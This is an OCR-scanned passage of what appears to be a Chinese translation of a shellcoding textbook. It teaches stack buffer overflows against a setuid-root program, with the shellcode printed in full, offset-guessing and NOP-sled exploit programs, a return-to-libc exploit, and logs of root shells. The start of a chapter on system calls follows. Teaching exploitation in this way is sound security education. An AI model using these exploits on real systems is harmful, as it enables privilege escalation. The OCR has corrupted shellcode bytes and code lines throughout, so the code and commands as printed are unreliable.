"\xeb\xla\x5e\x31\xc0\x88\x46\x07\x8d\xle\x89\x5e\x08\x89\x46" 
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xel" 
"\xff\xffi\xf£\x2£\x62\x69\x6e\x2£\x73\x68"; 


int main() 


{ 


int *ret; 

ret = (int *)&ret + 2; 

(*ret) = (int)shellcode; 
} 
运行 该 代码 段 。 
[jack@0day locall$ gcc shellcode.c -o shellcode 
[jackG0day local]$ ./shellcode 
sh-2.05b# 


OK, AMT! 我 们 终于 有 了 可 以 派生 shell 的 shellcode 了 ， 而 且 可 以 很 容易 地 把 它 注入 到 脆 
弱 的 缓冲 区 里 。 这 一 步 很 简单 。 但 为 了 执行 shellcode， 需 要 获取 程序 的 执行 控制 。 我 们 将 使 用 和 
前 面 例子 里 用 到 的 类 似 方法 ， 在 那个 例子 里 ， 我 们 用 选择 的 地 址 改写 RET， 使 RET 里 的 地 址 被 加 
载 到 BITP 并 在 随后 被 执行 ， 成 功 地 强制 程序 连续 要 求 两 次 输入 。 那 么 ， 在 这 里 应 该 用 什么 地 址 改 
写 RET 呢 ? 对 ， 用 shellcode 的 第 一 条 指令 的 地 址 。 这 样 的 话 ， 当 RET 被 弹出 栈 并 被 加 载 到 ETP 时 ， 
系统 执行 的 将 是 shellcode 的 第 一 条 指令 。 

整个 过 程 看 起 来 很 简单 ,但 实际 实现 起 来 却 相当 麻烦 。 就 是 在 这 个 地 方 , 许多 学 习 黑 客 技术 
的 人 第 一 次 裁 了 跟头 并 放弃 了 学 习 。 为 了 不 让 你 重 蹈 履 略 ， 我 们 先 来 解决 一 些 主要 的 问题 。 
2.5.1 地址 问题 

当 试 图 执行 用 户 提交 的 shellcode 时 ， 所 面临 的 最 困难 的 问题 是 找 出 shellcode 的 起 始 地 址 。 这 
些 年 来 ， 人 们 想 出 了 很 多 办 法 来 解决 这 个 问题 ， 我 们 先 介绍 一 种 使 用 最 广 的 方法 。 

在 内 存 中 寻找 shellcode 的 起 始 地 址 有 很 多 方法 ， 其 中 之 一 是 猜测 。 可 以 基于 以 往 学 过 的 
知识 进行 猜测 ， 因 为 我 们 知道 每 个 程序 的 栈 都 以 同样 的 地 址 开始 。( 大 多 数 近来 的 操作 系统 





故意 变化 栈 的 地 址 ， 从 而 使 这 种 类 型 的 攻击 变 得 更 困难 。 在 大 多 数 的 Linux 版 本 里 ， 这 是 一 
个 可 选 的 内 核 补丁 。) 如 果 知 道 这 个 地 址 ， 那 么 就 应 该 可 以 根据 这 个 地 址 猜测 shellcode 的 起 
始 地 址 。 


写 一 段 查找 栈 指针 ESP 位 置 的 简单 代码 很 容易 。 如 果 知道 了 ESP 的 地 址 , 那么 就 可 以 根据 


这 个 地 址 来 猜测 当前 地 址 与 shellcode 之 间 的 偏 移 距 离 。 这 个 偏 移 将 是 shellcode 的 第 一 条 指 


$. 


首先 ， 找 出 ESP 的 地 址 。 


// find_start.c 

unsigned long find_start (void) 
{ 

asm  ("movl $esp, %eax"); 


} 


int main() 
{ 

printf ("Ox%x\n",find_start()); 
} 
如 果 编 译 并 运行 这 个 程序 几 次 ， 可 以 得 到 : 
shellcoders@debian:~/chapter_2$ ./find start 
Oxbffffad8 
shellcodersG8debian:-/chapter 2$ ./find start 
Oxbffffad8 
shellcodersGdebian:-/chapter 2$ ./find start 
Oxbffffad8 
shellcodersGdebian:-/chapter 2$ ./find start 
Oxbffffad8 


我 们 是 在 Debian 3.1r4 上 运行 的 ， 因 此 ， 依 据 具体 情形 ， 你 可 能 会 得 到 不 一 样 的 结果 。 如 果 


你 注意 到 程序 输出 的 地 址 每 次 都 不 一 样 ， 可 能 意味 着 你 正在 运行 的 是 带 有 grsecurity 补 本 《或 类 似 
的 ) 的 发 行 版 。 如 果 碰 到 这 种 情形 ， 下 面 的 例子 在 你 的 机 器 上 将 难以 重 现 ,但 第 14 章 解释 了 怎样 
规避 这 种 随机 结果 。 在 这 期 间 ， 我 们 假设 你 运行 的 是 有 一 致 栈 指针 地 址 的 版 本 。 


我 们 先 拿 一 个 简单 的 程序 练 练 手 。 
// victim.c 
int main(int argc,char *argv[]) 


{ 
char little array[512]; 


if (argc » 1) 
strcpy(little array,argv[1]); 
} 


程序 从 命令 行 获取 输入 后 , 在 没有 进行 边界 检查 的 情况 下 ， 把 输入 数据 复制 到 数组 。 为 了 获 


得 根 特 权 ， 先 把 目标 程序 的 属 主 设 为 root， 再 把 suid 位 打开 。 现 在 ， 你 以 普通 用 户 的 身份 〈 不 
是 根 用 户 ) 登录 系统 ， 并 破解 这 个 程序 ， 到 结束 时 ， 你 应 该 有 了 根 特权 。 
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[jacke0day local]$ sudo chown root victim 
[jack@0day local]$ sudo chmod +s victim 


因此 ， 我 们 有 了 “受害 者 ”。 可 以 在 bash 里 再 次 使 用 printf 命 令 把 shellcode 放 到 程序 的 命令 
行 参数 里 。 传 递 像 下 面 这 样 的 命令 行 参数 ; 


./victim <our shellcode><some padding><our choice of saved return 
address> 


首先 要 做 的 是 在 命令 行 字符 串 里 找 出 改写 保存 的 返回 地 址 的 偏 移 量 。 在 这 个 例子 里 , 我 们 知 
道 它 至 少 是 512， 但 最 好 尝试 不 同 长 度 的 字符 串 ， 直 至 找到 正确 的 那个 。 

关于 bash 和 命令 代替 的 快速 注解 : 可 以 通过 在 printf 前 面 放 一 个 $ 并 用 圆 括号 把 它 括 起 来 的 
方式 ， 把 它 的 输出 作为 命令 行 参数 传递 ， 像 下 面 这 样 : 

./victim $(printf "foo") 


可 以 让 printf 输出 一 长 串 零 ， 就 像 下 面 这 样 : 
shellcoders@debian:~/chapter_2$ printf "%020x" 
00000000000000000000 


可 以 用 这 个 方法 猜测 保存 的 返回 地 址 在 易 受 攻击 的 程序 里 的 偏 移 量 : 


shellcoders@debian:~/chapter_2$ ./victim $(printf "%0512x" 0) 
shelicoders@debian:~/chapter_2$ ./victim $(printf "%0516x" 0) 
shellcoders@debian:~/chapter_2$ ./victim $(printf "%0520x" 0) 
shellcoders@debian:~/chapter_2$ ./victim $(printf "%0524x" 0) 
Segmentation fault 

shellcoders@debian:~/chapter_2$ ./victim $(printf "%0528x" 0) 
Segmentation fault 


因此 ， 从 出 现 段 故障 的 长 度 信息 中 我 们 可 以 判定 ， 保 存 的 返回 地 址 或 许 是 在 命令 行 参数 的 
524~528BŻ Ù]. 

我 们 已 经 有 了 准备 让 这 个 程序 运行 的 shellcode， 也 大 致知 道 了 保存 的 返回 地 址 可 能 会 在 哪 
里 ， 继 续 下 一 步 。 

shellcode 有 40B 。 我 们 随后 填充 480B 或 484B， 然 后 是 保存 的 返回 地 址 。 保 存 的 返回 地 址 应 当 
比 0xbffffad8 稍 微小 一 些 。 试 一 下 ， 看 保存 的 返回 地 址 在 哪里 。 命 令 行 像 下 面 这 样 : 


shellcodersGdebian:-/chapter 2$ ./victim $(printf 
"\xeb\xla\x5e\x31\xc0\x88\x46\x07\x8d\xle\x89\x5e\x08\x89\x46\x0c\xb0\x0 
b\x89\x£3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xel\xff\xff\xff\x2£\x62\x6 
9\x6e\x2£\x73\x68%0480x\xd8\xfa\xff\xbf") 


请 注意 ，shellcode 在 字符 串 的 开头 ， 它 的 后 面 是 %0480x， 然 后 是 4B 的 保存 的 返回 地 址 。 如 
果 碰 到 正确 的 地 址 ， 它 应 该 开始 “执行 ” 栈 。 

当 运 行 这 个 命令 行 时 ， 会 得 到 ;: 

Segmentation fault 

于 是 可 以 尝试 把 填充 值 改 成 484B: 


shellcoders@debian:~/chapter_2$ ./victim $(printf 
"\xeb\xla\x5e\x31\xc0\x88\x46\x07\x8d\xle\x89\x5e\x08\x89\x46\x0c\xb0\x0 
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b\x89\xf£3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xel\xff\xffi\xff\x2£\x62\x6 
9\x6e\x2£\x73\x68%0484x\xd8\xfa\xff\xbf") 
Illegal instruction 


我 们 依然 得 到 了 Illegal instruction 提 示 ， 显 然 是 执行 了 不 正常 的 指令 。 现 在 试 着 改 一 
下 保存 的 返回 地 址 。 因 为 栈 在 内 存 里 是 向 下 增长 的 ， 也 就 是 说 ， 向 着 较 低 的 地 址 增长 ， 因 此 ， 
shellcode 的 地 址 应 当 比 0xbffffad8 低 一 些 

为 简短 起 见 ， 下 面 只 :显示 了 相关 命令 行 的 结尾 部 分 和 输出 : 

8%0484x\x38\xfta\xfi\xbft") 

现在 开始 编写 利用 程序 ， 它 允许 我 们 猜测 程序 开头 与 shellcode 第 一 条 指令 之 间 的 偏 移 。( 这 

主意 是 从 Lamagra 那 里 借用 的 。) 


#include <stdlib.h> 





#define offset_size 0 
#define buffer_size 512 
char sc[] = 


"\xeb\xla\x5e\x31\xc0\x88\x46\x07\x8d\xle\x89\x5e\x08\x89\x46" 
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xel" 
"\xfi\xfi\xff\x2£\x62\x69\x6e\x2£\x73\x68"; 


unsigned long find_start(void) { 
asm  ("movl %esp,%eax"); 


int main(int argc, char *argv[]) 
{ 
char *buff, *ptr; 
long *addr ptr, addr; 
int offset=offset_size, bsize=buffer_size; 
int i; 


if (argc > 1) bsize = atoi(argv[1]); 
if (argc > 2) offset = atoi(argv[21); 


addr = find_start() - offset; 
printf('Attempting address: Ox%x\n", addr); 


ptr = buff; 

addr_ptr = (long *) ptr; 

for (i = 0; i < bsize; i+=4) 
*(addr_ptr++) = addr; 

ptr += 4; 

for (i = 0; i < strlen(sc); i++) 


*(ptrt+) = sc[i]; 
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buff[bsize - 1] = '\0'; 


memcpy (buff, "BUF=",4); 
putenv (buff); 
system("/bin/bash"); 

} 


为 了 破解 这 个 有 问题 的 程序 ， 先 用 返回 地 址 生成 shellcode， 然 后 用 这 个 shellcode 生 成 程序 的 
输出 结果 运行 这 个 有 问题 的 程序 。 假 如 不 作弊 的 话 ， 那 我 们 应 该 不 知道 正确 的 偏 移 量 ， 因 此 必须 
反复 猜测 ， 直 人 至 得 到 派生 的 shell。 


jackG80day local]$ ./attack 500 
Using address: Oxbfffd768 
jack@Oday local]$ ./victim $BUF 


一 切 正常 ， 因 为 偏 移 量 不 够 大 〈 记 住 ， 在 这 个 例子 里 ， 数 组 的 大 小 是 512B )。 
[jack@0day local]$ ./attack 800 
Using address: Oxbfffe7c8 


jackG80day local]$ ./victim $BUF 
Segmentation fault 
BCE THA? R, BAT! 这 次 的 偏 移 量 又 太 大 了 ， 试 个 小 一 点 的 吧 ; 
jack80day local]$ ./attack 550 

Using address: Oxbffff188 

jack@0day local]$ ./victim SBUF 

Segmentation fault 
jackG0day local]$ ./attack 575 
Using address: Oxbfffe798 
jack@Oday local]$ ./victim SBUF 
Segmentation fault 
jackG0day local]$ ./attack 590 
Using address: Oxbfffe908 
jack@Oday local]$ ./victim $BUF 
Illegal instruction 


照 这 样 下 去 ， 要 猜 出 正确 的 偏 移 量 可 能 需要 很 长 时 间 。 但 就 在 这 时 ， 幸 运 之 神 降临 了 ， 


jack@0day local]$ ./attack 595 
Using address: Oxbfffe971 
jackG0day local]$ ./victim $BUF 
Illegal instruction 

jackG0day local]$ ./attack 598 
Using address: Oxbfffe9ea 
[jack@Oday local]$ ./victim $BUF 
Illegal instruction 

jack80day local]$ ./exploit1 600 
Using address: Oxbfffea04 
jack@Oday local]$ ./hole $BUF 
sh-2.05b# id 

uid=0 (root) gid=0 (root) groups=0(root),10(wheel) 
sh-2.05b# 
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我 们 猜 到 了 正确 的 偏 移 量 ， 程 序 派生 了 root shell。 当 然 ， 实 际 尝 试 的 次 数 比 这 要 多 得 多 (说 
实在 的 ， 我 们 还 是 动 了 点 手脚 )， 但 为 了 节省 版 面 ， 我 们 省 略 了 部 分 无 用 的 信息 。 


警告 我 们 是 在 Red H Hat 9.0 上 做 这 个 实验 的 。 实验 结 果 取 决 于 Linux 发 行 版 本 、 内 核 版 本 和 其 他 
”因素 ， 所 以 你 的 结果 可 能 和 上 面 的 不 太一 样 。 


这 种 破解 过 程 元 长 而 乏味 , 我 们 必须 反复 猜测 偏 移 量 ， 而 且 有 时 候 猜 测 错误 还 可 能 导致 程序 
崩溃 。 对 于 这 样 的 小 程序 ， 崩 演 当 然 算 不 上 什么 ,但 是 如 果 要 重复 重启 大 程序 ， 就 要 花费 大 量 时 
间 与 精力 。 下 一 节 将 介绍 更 简单 的 破解 方法 。 

2.5.2 NOP 法 

手动 猜测 偏 移 量 是 比较 麻烦 的 ， 特 别 是 当 存 在 多 个 偏 移 目标 时 ， 就 更 麻烦 了 。 但 是 ， 如 果 在 
设计 shellcode 时 使 多 个 不 同 的 偏 移 量 允许 我 们 获得 执行 控制 ， 那 么 肯定 可 以 减少 猜测 时 间 ， 也 将 
使 整个 破解 过 程 更 有 效率 。 

可 以 选用 NOP 法 来 增加 湾 在 的 偏 移 量 的 数量 。 No OPerations (NOP) 是 延迟 执行 时 间 的 指令 。 
在 汇编 代码 里 ，NOP 主 要 用 来 调 速 ; 在 这 个 例子 里 ， 用 NOP 来 创建 一 大 段 不 运行 的 指令 区 。 为 了 
提高 命中 率 ， 可 以 用 NOP 填 充 shellcode 的 头 部 ， 这 样 的 话 ， 只 要 猜测 的 地 址 位 于 NOP 范 围 之 内 ， 
处 理 器 在 执行 完 NOP 之 后 ， 就 会 执行 派生 shell 的 shellcode。 现 在 ， 再 也 不 必 苛 求 我 们 猜 到 精确 的 
偏 移 量 ， 而 只 要 求 偏 移 量 位 于 NOP 的 范围 内 ，shellcode 都 会 得 以 执行 。 我 们 把 这 个 过 程 称 为 “用 
NOP 填 充 ” 或 创建 NOP 热 。 当 你 深入 研究 黑客 技术 时 ， 会 经 常 听 到 这 些 行 话 。 

重新 编写 攻击 程序 ， 在 shellcode 和 偏 移 量 之 前 加 上 NOP 热 。 IA32 上 用 0x90 表 示 NOP。 有 许多 
其 他 的 指令 和 指令 组 合 与 NOP 的 效果 类 似 ， 但 是 本 章 不 会 过 多 涉及 这 些 内 容 。 


#include <stdlib.h> 





#define DEFAULT_OFFSET 0 
#define DEFAULT BUFFER SIZE 512 
#define NOP 0x90 


char shellcode[] = 


"\xeb\xla\x5e\x31\xc0O\x88\x46\x07\x8d\xle\x89\x5e\x08\x89\x46" 
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xel" 
"\xfi\xff\xff\x2£\x62\x69\x6e\x2£\x73\x68"; 


unsigned long get sp(void) { 
asm  ("movl $esp,£eax"); 


} 


void main(int argc, char *argv[]) 


{ 
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char *buff, *ptr; 
long *addr ptr, addr; 
int offset=DEFAULT_OFFSET, bsiz e-DEFAULT BUFFER, SIZE; 


int i; 


if (argc > 1) bsize = atoi(argv[1]); 
if (argc > 2) offset = atoi(argv[2]); 


if (! (buff = malloc(bsize))) { 
printf ("Can't allocate memory.\n"); 
exit(0); 

} 

addr = get_sp() - offset; 


printf("Using address: 0x%x\n", addr); 


ptr = buff; 

addr_ptr = (long *) ptr; 

for (i = 0; i < bsize; i+=4) 
*(addr_ptr++) = addr; 

for (i = 0; i < bsize/2; i++) 


buff[i] = NOP; 


ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); 
for (i = 0; i < strlen(shellcode); i++) 

*(ptr--) = shellcode[i]; 
buff[bsize - 1] = 'X0'; 


memcpy (buff, "BUF=",4); 
putenv (buff); 
system("/bin/bash"); 

} 


对 同样 的 目标 代码 运行 修改 后 的 程序 ， 看 看 会 发 生 什么 。 


[jack@Oday local]$ ./nopattack 600 

Using address: Oxbfffdd68 

[jackG0day locall$ ./victim $BUF 

sh-2.05b# id 

uid=0 (root) gid=0 (root) groups=0(root),10(wheel) 
sh-2.05b# 


这 个 偏 移 量 可 以 工作 ， 再 试 试 其 他 的 。 

[Jackeoday local]$ ./nopattack 590 

Using address: Oxbffff368 

[jack80day local]$ ./victim SBUF 

sh-2.05b# id 

uiG=0 {root) gid=0(root) groups=0 (root), 10 (wheel) 
sh-2.05b# 
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这 次 的 猜测 也 在 NOP 垫 内 ， 利 用 程序 仍然 可 以 正常 工作 。 但 我 们 能 走 多 远 呢 ? 


[jack@Oday local]$ ./nopattack 585 

Using address: Oxbffffld8 

[jackG0day locall$ ./victim $BUF 

sh-2.05b# id 

uid=0 (root) gid=0 (root) groups=0(root),10(wheel) 
sh-2.05b# 


通过 这 个 简单 的 例子 可 知 ， 比 起 没有 NOP 热 的 时 候 ， 我 们 多 了 15~25$ 次 成 功 的 机 会 。 
2.6 ”战胜 不 可 执行 栈 


前 面 的 漏 润 利用 程序 可 以 正常 工作 ， 因 为 可 以 在 栈 上 执行 指令 。 但 是 作为 一 种 保护 措施 ， 许 
多 操作 系统 〈 例 如 Solaris 和 OpenBSD) 不 允许 在 栈 上 执行 代码 。 

但 你 可 能 已 经 猜 到 ， 在 利用 栈 溢 出 的 过 程 中 , 不 一 定 非 要 在 栈 上 执行 代码 。 我 们 在 前 面 以 它 
为 例 ， 主 要 是 因为 它 很 常见 ， 也 易于 理解 ， 而 且 工作 稳定 。 当 你 遇 到 不 可 执行 栈 时 ， 可 以 用 “ 返 
Ellibe (Return to libc)” 方 法 。 说 到 底 ， 我 们 应 该 选用 最 常见 的 、 最 容易 展示 的 libc 函 数 库 导 出 对 
libc 库 的 系统 调用 。 当 目标 系统 受到 不 可 执行 栈 保护 时 ， 返 回 libc 就 可 能 破解 。 
返回 libc 

上 面 提 到 了 返回 libc 的 神奇 作用 , 那么 返回 libc 究 竟 是 怎样 工作 的 呢 ? 从 高 层 看 , 为 简单 起 见 ， 
假设 我 们 可 以 完全 控制 EIP， 那 么 就 可 以 把 任意 想 执 行 的 地 址 放 入 EIP。 简 而 言 之 ， 利 用 脆弱 的 
缓冲 区 ， 我 们 可 以 完全 控制 程序 的 执行 。 

利用 栈 溢出 的 传统 方法 是 把 控制 权 交 给 栈 上 的 指令 ， 但 返回 libc 则 是 把 控制 权 交 给 特定 的 动 
态 库 函 数 。 动 态 库 函数 不 在 栈 上 ， 也 就 意味 着 我 们 可 以 绕 过 不 可 执行 栈 的 限制 。 当 然 ， 为 了 攻击 
成 功 ， 还 需要 仔细 挑选 动态 库 函 数 。 从 理论 上 讲 ， 它 必须 符合 以 下 两 个 条 件 。 

a 它 必须 是 常见 的 动态 库 函 数 ， 在 绝 大 多 数 的 程序 里 都 会 出 现 。 

O 函数 库 里 的 函数 应 给 予 我 们 最 大 的 灵活 性 ， 以 便 我 们 能 派生 shell 或 做 其 他 事 。 

libc 函 数 库 是 满足 这 两 个 条 件 的 最 佳 选择 。 因 为 libc 是 标准 的 C 函 数 库 ， 基 本 上 包括 了 常见 的 
C 函 数 ， 并 且 这 些 函 数 都 是 共享 的 〈 这 是 函数 库 的 定义 )， 这 意味 着 任何 程序 〈 包 括 libc) 都 可 以 
访问 这 些 函 数 。 这 意味 着 ， 如 果 任 何 程序 都 可 以 访问 这 些 函 数 ， 那 我 们 的 破解 程序 为 什么 不 能 ? 
我 们 所 要 做 的 只 是 把 执行 流程 指向 想 用 的 库 函 数 的 地 址 〈 当 然 ， 还 要 设置 常见 的 参数 )， 它 将 被 
执行 。 

对 于 返回 libc 的 破解 方式 ， 为 简单 起 见 ， 仅 让 它 派生 shell。 从 以 往 的 经 验 来 看 ， 最 好 用 的 libe 
函数 是 system()。 在 这 个 例子 里 ，system() 所 要 做 的 工作 是 接收 一 个 参数 ， 然 后 用 /bin/sh 执 
行 这 个 参数 。 因 此 ， 只 需 把 /bin/sh 作 为 system() 的 参数 ， 在 系统 执行 system() 后， 就 会 得 到 
shell。 这 样 一 来 ， 不 需要 在 栈 上 执行 任何 代码 ， 直 接 把 控制 权 交 给 C 函 数 库 里 的 system() 函数 就 
可 以 了 。 

RAM system () 怎样 获取 参数 比较 感 兴趣 。 基本 上 , 我 们 所 做 的 只 是 传递 一 个 指向 我 们 想 
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执行 的 字符 串 〈《/bin/sh) 的 指针 。 根 据 以 往 的 经 验 ， 当 程序 正常 执行 一 个 函数 (在 这 个 例子 
里 ， 这 个 函数 被 命名 为 the_function) 时 ， 参 数 入 栈 的 顺序 和 它 在 代码 里 的 顺序 正好 相反 ， 
系统 接 下 来 的 处 理 过 程 是 我 们 真正 感 兴趣 的 ， 也 正 因 为 如 此 ， 我 们 才 得 以 将 参数 传递 给 
system(). 

首先 执行 CALL the_function，CALL 把 下 一 条 指令 (我 们 想 返 回 的 ) 的 地 址 压 入 栈 ， 并 
将 ESP 减 4。 当 the_function 返 回 时 ，RET (或 EIP) 将 被 弹出 栈 ， 因 而 ESP 直 接 指向 RET 之 后 
的 地 址 。 

现在 ， 执 行 流程 应 该 重 定向 到 将 被 执行 的 system() 。the_function 假 设 ESP 已 指向 应 该 返 
回 的 地 址 ， 并 想当然 地 认为 所 需要 的 参数 正在 栈 上 等 着 它 ， 而 第 一 个 参数 位 于 RET 之 后 。 这 是 栈 
操作 的 正常 行为 。 因 此 , 把 返回 system() 的 地 址 和 参数 (在 这 个 例子 里 , 参数 是 一 个 指向 /bin/sh 
的 指针 ) 放 在 8 字 节 里 。 当 the_function 返 回 时 ， 系 统 将 返回 〈 或 跳 转 ， 取 决 于 你 怎么 考虑 这 个 
情形 ) 到 system() ， 而 system() 需要 的 参数 正在 栈 上 等 着 它 。 

通过 以 上 的 描述 ， 你 应 该 可 以 明白 这 个 方法 的 基本 思想 了 。 为 了 编写 返回 libc 的 破解 代码 ， 
必须 完成 以 下 的 准备 工作 。 

(1) 确定 system() 的 地 址 。 

(2) 确定 /bin/sh 的 地 址 。 

(3) 找 出 exit () 的 地 址 ， 以 便 干 净 地 退出 被 攻击 的 程序 。 

反 汇 编 任 何 一 个 C 或 C++ 程序 ， 基 本 上 都 能 在 libc 里 发 现 system() 的 地 址 。gcc 在 默认 编译 时 
包括 libc， 因 此 ， 可 以 用 下 面 的 程序 找 出 system() 的 地 址 。 


int main() 
{ 
} 


编译 后 ， 用 gdb 找 出 system() 的 地 址 。 


[root@0day local]# gdb file 

(gdb) break main 

Breakpoint 1 at 0x804832e 

(gdb) run 

Starting program: /usr/local/book/file 





Breakpoint 1, 0x0804832e in main () 

(gdb) p system 

$1 = {<text variable, no debug info») 0x4203f2c0 «system» 
(gdb) 


BAIR system () 的 地 址 是 0ox4203f2c0。 顺 便 找 出 exit() 的 地 址 。 


[root@0day local]# gdb file 

(gdb) break main 

Breakpoint 1 at 0x804832e 

(gdb) run 

Starting program: /usr/local/book/file 
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Breakpoint 1, 0x0804832e in main () 

(gdb) p exit 

$1 = {<text variable, no debug info») 0x42029bb0 «exit» 
(gdb) 


找到 exit() 的 地 址 是 0x42029bbo。 最 后 ， 用 memfetche 工 具 寻 找 /binysh 的 地 址 。 
memfetch 的 功能 是 把 指定 进程 的 内 存 数 据 全 部 转 储 到 一 个 二 进 制 文件 中 ， 我 们 可 以 在 这 个 文件 
里 寻找 /bin/sh 的 地 址 。 除 此 之 外 ， 也 可 以 把 /binysh 保 存在 环境 变量 里 ， 然 后 找到 这 个 变量 
的 地 址 。 

最 后 ， 我 们 为 最 初 的 问题 程序 编写 破解 代码 ， 这 个 破解 过 程 既 简 单 又 简短 。 步 又 如 下 。 

(1) 用 垃圾 数据 填 满 脆弱 的 缓冲 区 与 返回 地 址 之 间 的 空间 。 

(2) 用 system() 的 地 址 改写 返回 地 址 。 

(3) 在 system() 后 加 上 exit() 的 地 址 。 

(4) 再 加 上 /bin/sh 的 地 址 。 

实现 代码 如 下 : 


#include <stdlib.h> 


#define offset_size 0 
#define buffer size 600 


char sc[] = 
"\xcO\x£2\x03\x42" //system() 
"\x02\x9b\xb0\x42" //exit() 
"\xa0\x8a\xb2\x42" //binsh 


unsigned long find start(void) { 
asm  ("movl %esp, teax"); 


} 


int main(int argc, char *argv[]) 
{ 
char *buff, *ptr; 
long *addr_ptr, addr; 
int offset=offset_size, bsize=buffer_size; 


int i; 


if (argc > 1) bsize = atoi(argv[11); 
if (argc > 2) offset = atoi(argv[21); 


addr = find_start() - offset; 
ptr = buff; 

addr_ptr = (long *) ptr; 

for (i = 0; i < bsize; i+=4) 


© 在 http:/lcamtufcoredump.cx/ 可 以 找到 这 个 工具 。 





*(addr_ptr++) = addr; 











ptr += 4; 

for (i = 0; i < strlen(sc); i++) 
*(ptr++) = sc[il; 

buff[bsize - 1] = '\O'; 


memcpy (buff, "BUF=",4); 

putenv (buff); 

system("/bin/bash"); 
H 
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本 章 介 绍 了 基本 的 栈 缓存 区 溢出 知识 。 栈 涪 出 利用 了 栈 内 存储 的 数据 , 目的 是 把 指令 注入 到 
脆弱 的 缓冲 区 , 并 改写 函数 的 返回 地 址 。 有 了 改写 后 的 返回 地 址 , 我 们 就 可 以 控制 程序 的 执行 流 ， 


然后 插入 shellcode 或 指令 ， 从 而 派生 根 shell， 之 后 就 可 以 执行 根 shell 了 。 本 书后 续 的 大 部 分 内 容 
还 会 更 深入 地 介绍 栈 涪 出 。 


shellcode 








hellcode 是 一 组 可 注入 的 指令 ， 可 以 在 被 攻击 的 程序 内 运行 。 因 为 shellcode 要 直接 操作 寄 
存 器 和 程序 的 函数 ， 所 以 通常 用 汇编 语言 编写 并 被 翻译 为 十 六 进 制 操作 码 。 因 此 ， 你 不 
能 用 高 级 语言 编写 shellcode， 即 使 是 一 些 细微 的 差别 ， 也 可 能 导致 shellcode 无 法 准确 执行 ， 这 些 
因素 也 是 导致 编写 shellcode 有 些 难 度 的 原因 。 本 章 将 揭 开 shellcode 神 秘 的 面纱 ， 并 教 你 编写 属于 
自己 的 shellcode。 
术语 shellcode 源 自 它 最 初 的 用 处 一 一 它 是 漏洞 利用 程序 的 特殊 部 分 ， 用 来 派生 根 shell。 当 
然 ， 现 在 这 也 是 shellcode 最 普通 的 用 法 ， 但 有 许多 程序 员 精 心 设计 shellcode， 使 它 能 完成 更 多 
的 工作 ， 本 章 也 会 介绍 这 些 高 级 内 容 。 第 2 章 已 经 介绍 过 ， 破 解 漏洞 就 是 预先 把 shellcode 注 入 
缓冲 区 ， 然 后 欺骗 目标 程序 执行 它 。 如 果 你 在 第 2 章 做 过 那些 试验 ， 那 么 你 已 经 在 用 shellcode 
破解 程序 了 。 
理解 并 会 写 shellcode 是 一 项 必 备 的 基本 技能 ， 理 由 很 多 。 首 先 ， 要 确认 漏洞 是 否 可 以 被 利 
用 ， 你 必须 尝试 利用 它 ， 才 可 以 验证 。 这 看 起 来 是 常识 ， 但 的 确 有 许多 这 样 的 人 ， 他 们 乐于 描 
述 漏洞 的 脆弱 性 ， 却 不 提供 可 靠 的 证 据 。 更 糟糕 的 是 ， 某 些 程序 员 明 明知 道 某 个 程序 有 漏洞 ， 
却 声明 根本 不 是 这 人 么 回 事 〈 通 常 是 因为 最 初 的 发 现 者 不 知道 怎样 利用 这 个 漏洞 ， 他 就 想当然 地 
认为 其 他 人 也 无 法 利用 它 )。 此 外 ， 软 件 厂 商 经 常 发 布 漏洞 通告 ， 却 从 不 提供 攻击 代码 。 在 这 
些 情况 下 ， 如 果 你 为 了 在 自己 的 系统 上 测试 这 个 bug， 想 生成 利用 程序 ， 你 可 能 不 得 不 亲自 动 
手写 shellcode。 


3.1 理解 系统 调用 


为 什么 要 写 shellcode 昵 ?因为 我 们 想 让 目标 程序 以 不 同 于 设计 者 预期 的 方式 运行 (或 者 说 让 
目标 程序 按 我 们 的 意图 行事 )， 而 操纵 程序 的 方法 之 一 是 强制 它 产生 系统 调用 。 系 统 调用 是 相当 
强大 的 函数 集 , 你 可 以 通过 它 访问 特定 的 操作 系统 的 函数 , 例如 接受 输入 、 处 理 输出 、 退 出 进程 、 
执行 二 进 制 文件 等 。 通 过 系统 调用 ， 你 可 以 直接 访问 系统 内 核 ， 也 就 是 说 你 可 以 访问 读 写 文件 之 
类 的 低级 函数 。 系 统 调用 也 是 受 保护 的 内 核 模式 和 用 户 模 式 之 间 的 接口 。 在 理论 上 ， 实现 受 保护 
内 核 模式 就 是 阻止 用 户 的 应 用 程序 干涉 或 危及 操作 系统 。 当 运行 在 用 户 模 式 下 的 程序 企图 访问 内 
核 的 内 存 空间 时 ， 系 统 将 产生 “访问 异常 ”， 阻 止 这 个 程序 直接 访问 内 核 的 内 存 空 间 。 但 是 ， 某 
些 程 序 在 正常 运行 时 , 需要 请 求 一 些 系 统 级 的 服务 , 这 时 系统 调用 就 作为 正常 的 用 户 模式 和 内 核 
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模式 之 间 的 接口 ， 在 保证 操作 安全 的 情况 下 尽量 响应 这 些 请 求 。 

在 Linux 里 有 两 种 方法 来 执行 系统 调用 。 间 接 的 方法 是 C 库 包装 (libc)， 直 接 的 方法 是 用 汇编 
指令 (把 适当 的 参数 加 载 到 寄存 器 ， 然 后 调用 软 中 断 ) 执行 系统 调用 。 创 建 libc 包 装 的 原因 是 ， 
如 果 某 个 系统 调用 为 了 提供 更 有 用 的 功能 〈 例 如 malloc) 而 改动 了 ， 程 序 可 以 继续 正常 运行 。 也 
就 是 说 ， 大 多 数 libc 系 统 调用 和 实际 的 内 核 系统 调用 非常 类 似 。 

在 Linux 里 ， 程 序 道 过 int 0x80 软 中 断 来 执行 系统 调用 。 当 程序 在 用 户 模式 下 执行 int 0x80 
时 ，CPU 切 换 到 内 核 模式 并 执行 相应 的 系统 调用 。Linux 使 用 的 系统 调用 方法 不 同 于 其 他 的 UNIX 
系统 ， 它 在 系统 调用 时 使 用 fastcall 约 定 ， 这 对 系统 调用 来 说 ， 将 提高 寄存 器 的 使 用 效率 。 系 统 调 
用 的 过 程 如 下 。 

(1) 把 系统 调用 编号 载 入 EAX。 

(2) 把 系统 调用 的 参数 压 入 其 他 的 寄存 器 。 

(3) 执行 int 0x80 指 令 。 

